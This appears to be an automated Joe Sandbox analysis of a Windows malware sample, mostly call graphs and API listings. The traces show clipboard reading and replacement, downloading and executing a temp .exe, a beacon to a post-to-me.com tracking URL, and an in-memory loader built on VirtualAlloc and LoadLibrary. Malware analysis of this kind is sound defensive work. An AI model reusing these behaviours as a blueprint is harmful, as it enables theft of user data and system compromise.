64246->64218 64247->64223 64248->64223 64250 432904 64249->64250 64251 432919 64249->64251 64264 42eab9 20 API calls __dosmaperr 64250->64264 64251->64232 64253 432909 64265 42a58d 26 API calls _Deallocate 64253->64265 64255 432914 64255->64232 64266 434640 64256->64266 64258 4341c3 64258->64236 64258->64237 64258->64245 64259->64231 64260->64245 64261->64243 64262->64245 64263->64245 64264->64253 64265->64255 64267 43464c CallCatchBlock 64266->64267 64268 434654 64267->64268 64269 43466c 64267->64269 64301 42eaa6 20 API calls __dosmaperr 64268->64301 64271 434720 64269->64271 64276 4346a4 64269->64276 64306 42eaa6 20 API calls __dosmaperr 64271->64306 64272 434659 64302 42eab9 20 API calls __dosmaperr 64272->64302 64275 434725 64307 42eab9 20 API calls __dosmaperr 64275->64307 64291 439694 EnterCriticalSection 64276->64291 64277 434661 __wsopen_s 64277->64258 64280 43472d 64308 42a58d 26 API calls _Deallocate 64280->64308 64281 4346aa 64283 4346e3 64281->64283 64284 4346ce 64281->64284 64292 434745 64283->64292 64303 42eab9 20 API calls __dosmaperr 64284->64303 64287 4346d3 64304 42eaa6 20 API calls __dosmaperr 64287->64304 64288 4346de 64305 434718 LeaveCriticalSection __wsopen_s 64288->64305 64291->64281 64309 439911 64292->64309 64294 434757 64295 434770 SetFilePointerEx 64294->64295 64296 43475f 64294->64296 64297 434788 GetLastError 64295->64297 64300 434764 64295->64300 64322 42eab9 20 API calls __dosmaperr 64296->64322 64323 42ea83 20 API calls 2 library calls 64297->64323 64300->64288 64301->64272 64302->64277 64303->64287 64304->64288 64305->64277 64306->64275 64307->64280 64308->64277 64310 439933 64309->64310 64311 43991e 64309->64311 64315 439958 64310->64315 64326 42eaa6 20 API calls __dosmaperr 64310->64326 64324 42eaa6 20 API calls __dosmaperr 64311->64324 64314 439923 64325 42eab9 20 API calls __dosmaperr 64314->64325 64315->64294 64316 439963 64327 42eab9 20 API calls __dosmaperr 64316->64327 64319 43996b 64328 42a58d 26 API calls _Deallocate 64319->64328 64320 43992b 64320->64294 64322->64300 64323->64300 64324->64314 64325->64320 64326->64316 64327->64319 64328->64320 64329 402bfa InternetOpenW 64330 402e4b 64329->64330 64331 402c2d ListArray 64329->64331 64332 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 64330->64332 64341 42deed 64331->64341 64333 402e5a 64332->64333 64336 42deed std::_Locinfo::_Locinfo_ctor 26 API calls 64337 402e0d 64336->64337 64338 42deed std::_Locinfo::_Locinfo_ctor 26 API calls 64337->64338 64339 402e1f InternetOpenUrlW 64338->64339 64339->64330 64340 402e3a InternetCloseHandle InternetCloseHandle 64339->64340 64340->64330 64342 42df0a 64341->64342 64345 42defc 64341->64345 64350 42eab9 20 API calls __dosmaperr 64342->64350 64344 42df14 64351 42a58d 26 API calls _Deallocate 64344->64351 64345->64342 64348 42df3a 64345->64348 64347 402dff 64347->64336 64348->64347 64352 42eab9 20 API calls __dosmaperr 64348->64352 64350->64344 64351->64347 64352->64344 64353 40fbfc 64354 40fc08 CallCatchBlock 64353->64354 64382 40ffe9 64354->64382 64356 40fc0f 64357 40fd62 64356->64357 64360 40fc39 64356->64360 64403 4104c3 4 API calls 2 library calls 64357->64403 64359 40fd69 64404 42ffb9 28 API calls _Atexit 64359->64404 64371 40fc78 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 64360->64371 64397 42fcde 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 64360->64397 64362 40fd6f 64405 42ff6b 28 API calls _Atexit 64362->64405 64365 40fc52 64367 40fc58 64365->64367 64398 42fc82 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 64365->64398 64366 40fd77 64369 40fcd9 64393 4105dd 64369->64393 64371->64369 64399 42a356 167 API calls 3 library calls 64371->64399 64373 40fcdf 64374 40fcf4 64373->64374 64400 410613 GetModuleHandleW 64374->64400 64376 40fcfb 64376->64359 64377 40fcff 64376->64377 64378 40fd08 64377->64378 64401 42ff5c 28 API calls _Atexit 64377->64401 64402 410178 13 API calls 2 library calls 64378->64402 64381 40fd10 64381->64367 64383 40fff2 64382->64383 64406 41076b IsProcessorFeaturePresent 64383->64406 64385 40fffe 64407 428817 10 API calls 3 library calls 64385->64407 64387 410003 64392 410007 64387->64392 64408 431791 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64387->64408 64389 410010 64390 41001e 64389->64390 64409 428840 8 API calls 3 library calls 64389->64409 64390->64356 64392->64356 64410 426820 64393->64410 64396 410603 64396->64373 64397->64365 64398->64371 64399->64369 64400->64376 64401->64378 64402->64381 64403->64359 64404->64362 64405->64366 64406->64385 64407->64387 64408->64389 64409->64392 64411 4105f0 GetStartupInfoW 64410->64411 64411->64396 64412 4332ce 64413 4332db 64412->64413 64417 4332f3 64412->64417 64462 42eab9 20 API calls __dosmaperr 64413->64462 64415 4332e0 64463 42a58d 26 API calls _Deallocate 64415->64463 64418 4332eb 64417->64418 64419 43334e 64417->64419 64464 434cbd 21 API calls 2 library calls 64417->64464 64421 4328f8 __fread_nolock 26 API calls 64419->64421 64422 433366 64421->64422 64432 432e06 64422->64432 64424 43336d 64424->64418 64425 4328f8 __fread_nolock 26 API calls 64424->64425 64426 433399 64425->64426 64426->64418 64427 4328f8 __fread_nolock 26 API calls 64426->64427 64428 4333a7 64427->64428 64428->64418 64429 4328f8 __fread_nolock 26 API calls 64428->64429 64430 4333b7 64429->64430 64431 4328f8 __fread_nolock 26 API calls 64430->64431 64431->64418 64433 432e12 CallCatchBlock 64432->64433 64434 432e32 64433->64434 64435 432e1a 64433->64435 64437 432ef8 64434->64437 64442 432e6b 64434->64442 64531 42eaa6 20 API calls __dosmaperr 64435->64531 64538 42eaa6 20 API calls __dosmaperr 64437->64538 64439 432e1f 64532 42eab9 20 API calls __dosmaperr 64439->64532 64440 432efd 64539 42eab9 20 API calls __dosmaperr 64440->64539 64444 432e7a 64442->64444 64445 432e8f 64442->64445 64533 42eaa6 20 API calls __dosmaperr 64444->64533 64465 439694 EnterCriticalSection 64445->64465 64447 432e87 64540 42a58d 26 API calls _Deallocate 64447->64540 64449 432e95 64451 432eb1 64449->64451 64452 432ec6 64449->64452 64450 432e7f 64534 42eab9 20 API calls __dosmaperr 64450->64534 64535 42eab9 20 API calls __dosmaperr 64451->64535 64466 432f19 64452->64466 64454 432e27 __wsopen_s 64454->64424 64458 432eb6 64536 42eaa6 20 API calls __dosmaperr 64458->64536 64459 432ec1 64537 432ef0 LeaveCriticalSection __wsopen_s 64459->64537 64462->64415 64463->64418 64464->64419 64465->64449 64467 432f43 64466->64467 64468 432f2b 64466->64468 64469 4332ad 64467->64469 64475 432f88 64467->64475 64550 42eaa6 20 API calls __dosmaperr 64468->64550 64568 42eaa6 20 API calls __dosmaperr 64469->64568 64472 432f30 64551 42eab9 20 API calls __dosmaperr 64472->64551 64474 4332b2 64569 42eab9 20 API calls __dosmaperr 64474->64569 64477 432f93 64475->64477 64480 432f38 64475->64480 64484 432fc3 64475->64484 64552 42eaa6 20 API calls __dosmaperr 64477->64552 64478 432fa0 64570 42a58d 26 API calls _Deallocate 64478->64570 64480->64459 64481 432f98 64553 42eab9 20 API calls __dosmaperr 64481->64553 64485 432fdc 64484->64485 64486 433002 64484->64486 64487 43301e 64484->64487 64485->64486 64493 432fe9 64485->64493 64554 42eaa6 20 API calls __dosmaperr 64486->64554 64557 433697 21 API calls 3 library calls 64487->64557 64489 433007 64555 42eab9 20 API calls __dosmaperr 64489->64555 64541 43d355 64493->64541 64494 433035 64497 43345a _free 20 API calls 64494->64497 64495 43300e 64556 42a58d 26 API calls _Deallocate 64495->64556 64496 433187 64500 4331fd 64496->64500 64503 4331a0 GetConsoleMode 64496->64503 64498 43303e 64497->64498 64501 43345a _free 20 API calls 64498->64501 64502 433201 ReadFile 64500->64502 64504 433045 64501->64504 64505 433275 GetLastError 64502->64505 64506 43321b 64502->64506 64503->64500 64507 4331b1 64503->64507 64508 43306a 64504->64508 64509 43304f 64504->64509 64510 433282 64505->64510 64511 4331d9 64505->64511 64506->64505 64512 4331f2 64506->64512 64507->64502 64513 4331b7 ReadConsoleW 64507->64513 64560 4347de 64508->64560 64558 42eab9 20 API calls __dosmaperr 64509->64558 64566 42eab9 20 API calls __dosmaperr 64510->64566 64519 433019 __fread_nolock 64511->64519 64563 42ea83 20 API calls 2 library calls 64511->64563 64512->64519 64525 433240 64512->64525 64526 433257 64512->64526 64513->64512 64518 4331d3 GetLastError 64513->64518 64514 43345a _free 20 API calls 64514->64480 64518->64511 64519->64514 64520 433054 64559 42eaa6 20 API calls __dosmaperr 64520->64559 64521 433287 64567 42eaa6 20 API calls __dosmaperr 64521->64567 64564 432c35 31 API calls 3 library calls 64525->64564 64526->64519 64527 43326e 64526->64527 64565 432a75 29 API calls __fread_nolock 64527->64565 64530 433273 64530->64519 64531->64439 64532->64454 64533->64450 64534->64447 64535->64458 64536->64459 64537->64454 64538->64440 64539->64447 64540->64454 64542 43d362 64541->64542 64544 43d36f 64541->64544 64571 42eab9 20 API calls __dosmaperr 64542->64571 64546 43d37b 64544->64546 64572 42eab9 20 API calls __dosmaperr 64544->64572 64545 43d367 64545->64496 64546->64496 64548 43d39c 64573 42a58d 26 API calls _Deallocate 64548->64573 64550->64472 64551->64480 64552->64481 64553->64478 64554->64489 64555->64495 64556->64519 64557->64494 64558->64520 64559->64519 64561 434745 __fread_nolock 28 API calls 64560->64561 64562 4347f4 64561->64562 64562->64493 64563->64519 64564->64519 64565->64530 64566->64521 64567->64519 64568->64474 64569->64478 64570->64480 64571->64545 64572->64548 64573->64545 64574 212003c 64575 2120049 64574->64575 64589 2120e0f SetErrorMode SetErrorMode 64575->64589 64580 2120265 64581 21202ce VirtualProtect 64580->64581 64583 212030b 64581->64583 64582 2120439 VirtualFree 64587 21205f4 LoadLibraryA 64582->64587 64588 21204be 64582->64588 64583->64582 64584 21204e3 LoadLibraryA 64584->64588 64586 21208c7 64587->64586 64588->64584 64588->64587 64590 2120223 64589->64590 64591 2120d90 64590->64591 64592 2120dad 64591->64592 64593 2120dbb GetPEB 64592->64593 64594 2120238 VirtualAlloc 64592->64594 64593->64594 64594->64580 64595 589ca6 64596 589cb5 64595->64596 64599 58a446 64596->64599 64605 58a461 64599->64605 64600 58a46a CreateToolhelp32Snapshot 64601 58a486 Module32First 64600->64601 64600->64605 64602 58a495 64601->64602 64604 589cbe 64601->64604 64606 58a105 64602->64606 64605->64600 64605->64601 64607 58a130 64606->64607 64608 58a179 64607->64608 64609 58a141 VirtualAlloc 64607->64609 64608->64608 64609->64608

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                                                        • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                                                          • Part of subcall function 0040CC06: _strlen.LIBCMT ref: 0040CC1D
                                                                                                        • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                                                        • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                                                        • _strlen.LIBCMT ref: 00401749
                                                                                                        • _strlen.LIBCMT ref: 00401778
                                                                                                        • _strlen.LIBCMT ref: 004018BC
                                                                                                        • EmptyClipboard.USER32 ref: 004018D2
                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                                                        • CloseClipboard.USER32 ref: 0040193D
                                                                                                        • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                        • String ID: i
                                                                                                        • API String ID: 1583243082-3865851505
                                                                                                        • Opcode ID: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
                                                                                                        • Instruction ID: 84ae510e80891b91da9cfa011cccf91080e50da4f88b7c16b45420ac6e32ace8
                                                                                                        • Opcode Fuzzy Hash: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
                                                                                                        • Instruction Fuzzy Hash: BB51F331C00384DAE711ABA4EC467AD7774FF29306F04523AE805B22B3EB789A85C75D

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A0D
                                                                                                        • InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 00402A23
                                                                                                        • GetTempPathW.KERNEL32(00000105,?), ref: 00402A3F
                                                                                                        • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A55
                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A8E
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402ACA
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AE7
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00402AFD
                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00402B5E
                                                                                                        • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B73
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00402B7F
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00402B88
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00402B8B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                        • String ID: .exe$<$ShareScreen
                                                                                                        • API String ID: 3323492106-493228180
                                                                                                        • Opcode ID: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
                                                                                                        • Instruction ID: 1f3e70d10a2fb6dcbdd3680cf8e7ca54fef569da526477a1452c3d554320dc38
                                                                                                        • Opcode Fuzzy Hash: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
                                                                                                        • Instruction Fuzzy Hash: 6C41847190021CAFEB209F549D85FEA77BCFF04745F0080F6A548E2190DE749E858FA4
                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0058A46E
                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0058A48E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149087882.0000000000589000.00000040.00000020.00020000.00000000.sdmp, Offset: 00589000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_589000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 3833638111-0
                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction ID: 66ff3dc070acf8f1ba4f379fd837d0c55463eb093ca5f1786e69283db0d1faa1
                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction Fuzzy Hash: 2FF068311007116FFF203AF5A88DB6A7AE8BF85725F104529EA56A10D0D7B0E8458752

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 74 43d02c-43d05c call 43cd8f 77 43d077-43d083 call 43976e 74->77 78 43d05e-43d069 call 42eaa6 74->78 84 43d085-43d09a call 42eaa6 call 42eab9 77->84 85 43d09c-43d0e5 call 43ccfa 77->85 83 43d06b-43d072 call 42eab9 78->83 95 43d34e-43d354 83->95 84->83 93 43d152-43d15b GetFileType 85->93 94 43d0e7-43d0f0 85->94 96 43d1a4-43d1a7 93->96 97 43d15d-43d18e GetLastError call 42ea83 CloseHandle 93->97 99 43d0f2-43d0f6 94->99 100 43d127-43d14d GetLastError call 42ea83 94->100 102 43d1b0-43d1b6 96->102 103 43d1a9-43d1ae 96->103 97->83 111 43d194-43d19f call 42eab9 97->111 99->100 104 43d0f8-43d125 call 43ccfa 99->104 100->83 107 43d1ba-43d208 call 4396b7 102->107 108 43d1b8 102->108 103->107 104->93 104->100 117 43d20a-43d216 call 43cf0b 107->117 118 43d218-43d23c call 43caad 107->118 108->107 111->83 117->118 123 43d240-43d24a call 4335bd 117->123 124 43d24f-43d292 118->124 125 43d23e 118->125 123->95 127 43d2b3-43d2c1 124->127 128 43d294-43d298 124->128 125->123 131 43d2c7-43d2cb 127->131 132 43d34c 127->132 128->127 130 43d29a-43d2ae 128->130 130->127 131->132 133 43d2cd-43d300 CloseHandle call 43ccfa 131->133 132->95 136 43d302-43d32e GetLastError call 42ea83 call 439880 133->136 137 43d334-43d348 133->137 136->137 137->132
                                                                                                        APIs
                                                                                                          • Part of subcall function 0043CCFA: CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17
                                                                                                        • GetLastError.KERNEL32 ref: 0043D140
                                                                                                        • __dosmaperr.LIBCMT ref: 0043D147
                                                                                                        • GetFileType.KERNEL32(00000000), ref: 0043D153
                                                                                                        • GetLastError.KERNEL32 ref: 0043D15D
                                                                                                        • __dosmaperr.LIBCMT ref: 0043D166
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0043D186
                                                                                                        • CloseHandle.KERNEL32(?), ref: 0043D2D0
                                                                                                        • GetLastError.KERNEL32 ref: 0043D302
                                                                                                        • __dosmaperr.LIBCMT ref: 0043D309
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                        • String ID: H
                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                        • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                        • Instruction ID: 76b590644e61a1e30ee63bf02a6fb5b1311e46919e71f325493a9cd527e13796
                                                                                                        • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                        • Instruction Fuzzy Hash: 09A14732E101049FDF19AF68EC917AE7BB1AF0A324F14115EE815AB3D1D7389D12CB5A

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 142 432f19-432f29 143 432f43-432f45 142->143 144 432f2b-432f3e call 42eaa6 call 42eab9 142->144 145 432f4b-432f51 143->145 146 4332ad-4332ba call 42eaa6 call 42eab9 143->146 158 4332c5 144->158 145->146 149 432f57-432f82 145->149 163 4332c0 call 42a58d 146->163 149->146 153 432f88-432f91 149->153 156 432f93-432fa6 call 42eaa6 call 42eab9 153->156 157 432fab-432fad 153->157 156->163 161 432fb3-432fb7 157->161 162 4332a9-4332ab 157->162 164 4332c8-4332cd 158->164 161->162 166 432fbd-432fc1 161->166 162->164 163->158 166->156 169 432fc3-432fda 166->169 171 432ff7-433000 169->171 172 432fdc-432fdf 169->172 175 433002-433019 call 42eaa6 call 42eab9 call 42a58d 171->175 176 43301e-433028 171->176 173 432fe1-432fe7 172->173 174 432fe9-432ff2 172->174 173->174 173->175 177 433093-4330ad 174->177 207 4331e0 175->207 179 43302a-43302c 176->179 180 43302f-43304d call 433697 call 43345a * 2 176->180 182 4330b3-4330c3 177->182 183 433181-43318a call 43d355 177->183 179->180 211 43306a-433090 call 4347de 180->211 212 43304f-433065 call 42eab9 call 42eaa6 180->212 182->183 187 4330c9-4330cb 182->187 195 4331fd 183->195 196 43318c-43319e 183->196 187->183 191 4330d1-4330f7 187->191 191->183 197 4330fd-433110 191->197 200 433201-433219 ReadFile 195->200 196->195 202 4331a0-4331af GetConsoleMode 196->202 197->183 198 433112-433114 197->198 198->183 203 433116-433141 198->203 205 433275-433280 GetLastError 200->205 206 43321b-433221 200->206 202->195 208 4331b1-4331b5 202->208 203->183 210 433143-433156 203->210 213 433282-433294 call 42eab9 call 42eaa6 205->213 214 433299-43329c 205->214 206->205 215 433223 206->215 209 4331e3-4331ed call 43345a 207->209 208->200 216 4331b7-4331d1 ReadConsoleW 208->216 209->164 210->183 218 433158-43315a 210->218 211->177 212->207 213->207 225 4332a2-4332a4 214->225 226 4331d9-4331df call 42ea83 214->226 222 433226-433238 215->222 223 4331d3 GetLastError 216->223 224 4331f2-4331fb 216->224 218->183 228 43315c-43317c 218->228 222->209 232 43323a-43323e 222->232 223->226 224->222 225->209 226->207 228->183 236 433240-433250 call 432c35 232->236 237 433257-433262 232->237 249 433253-433255 236->249 239 433264 call 432d85 237->239 240 43326e-433273 call 432a75 237->240 247 433269-43326c 239->247 240->247 247->249 249->209
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                        • Instruction ID: 8b8381e38334751f3c5fee40e88eacdf1446f1079df49a385922c4ea532b4e29
                                                                                                        • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                        • Instruction Fuzzy Hash: 4CC10670E04345AFDF11DFA9D841BAEBBB0BF0D305F14519AE805A7392C7789A41CB69

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 250 212003c-2120047 251 2120049 250->251 252 212004c-2120263 call 2120a3f call 2120e0f call 2120d90 VirtualAlloc 250->252 251->252 267 2120265-2120289 call 2120a69 252->267 268 212028b-2120292 252->268 273 21202ce-21203c2 VirtualProtect call 2120cce call 2120ce7 267->273 270 21202a1-21202b0 268->270 272 21202b2-21202cc 270->272 270->273 272->270 279 21203d1-21203e0 273->279 280 21203e2-2120437 call 2120ce7 279->280 281 2120439-21204b8 VirtualFree 279->281 280->279 282 21205f4-21205fe 281->282 283 21204be-21204cd 281->283 286 2120604-212060d 282->286 287 212077f-2120789 282->287 285 21204d3-21204dd 283->285 285->282 292 21204e3-2120505 LoadLibraryA 285->292 286->287 293 2120613-2120637 286->293 290 21207a6-21207b0 287->290 291 212078b-21207a3 287->291 294 21207b6-21207cb 290->294 295 212086e-21208be LoadLibraryA 290->295 291->290 296 2120517-2120520 292->296 297 2120507-2120515 292->297 298 212063e-2120648 293->298 299 21207d2-21207d5 294->299 302 21208c7-21208f9 295->302 300 2120526-2120547 296->300 297->300 298->287 301 212064e-212065a 298->301 303 21207d7-21207e0 299->303 304 2120824-2120833 299->304 305 212054d-2120550 300->305 301->287 306 2120660-212066a 301->306 307 2120902-212091d 302->307 308 21208fb-2120901 302->308 309 21207e2 303->309 310 21207e4-2120822 303->310 314 2120839-212083c 304->314 311 21205e0-21205ef 305->311 312 2120556-212056b 305->312 313 212067a-2120689 306->313 308->307 309->304 310->299 311->285 315 212056f-212057a 312->315 316 212056d 312->316 317 2120750-212077a 313->317 318 212068f-21206b2 313->318 314->295 319 212083e-2120847 314->319 321 212059b-21205bb 315->321 322 212057c-2120599 315->322 316->311 317->298 323 21206b4-21206ed 318->323 324 21206ef-21206fc 318->324 325 212084b-212086c 319->325 326 2120849 319->326 333 21205bd-21205db 321->333 322->333 323->324 327 212074b 324->327 328 21206fe-2120748 324->328 325->314 326->295 327->313 328->327 333->305
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0212024D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_2120000_DLKs2Qeljg.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID: cess$kernel32.dll
                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction ID: 6307871ac7b424446d8f48e480cf3fe90682051c211dfdc8c527356dcb06ef3a
                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction Fuzzy Hash: 61526A74A01229DFDB64CF58C984BACBBB1BF09304F1581D9E54DAB351DB30AA99CF14

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C1D
                                                                                                          • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                          • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E30
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00402E41
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00402E44
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandleOpen_wcslen
                                                                                                        • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                                        • API String ID: 3067768807-1501832161
                                                                                                        • Opcode ID: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
                                                                                                        • Instruction ID: 38c4ea95430cb0d064a2c81279cd8101482ed185274a1110c797b87c00f11b19
                                                                                                        • Opcode Fuzzy Hash: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
                                                                                                        • Instruction Fuzzy Hash: 4C517095A65344A9E320EBB0BC46B3633B8FF58712F10543BE518CB2F2E7B49944875E

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                        • String ID:
                                                                                                        • API String ID: 1687354797-0
                                                                                                        • Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                        • Instruction ID: ef80ad8abc8d01ee6ed88eea47d540721f1d2954bb97cc6dce8e21ba99fc2e21
                                                                                                        • Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                        • Instruction Fuzzy Hash: EB215172C042489ADF15EBF5D8417DEB7F8AF08318F54407FE400B62C1DB7D89448A69

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • std::_Cnd_initX.LIBCPMT ref: 00405812
                                                                                                        • __Cnd_signal.LIBCPMT ref: 0040581E
                                                                                                        • std::_Cnd_initX.LIBCPMT ref: 00405833
                                                                                                        • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 0040583A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_DLKs2Qeljg.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                        • String ID:
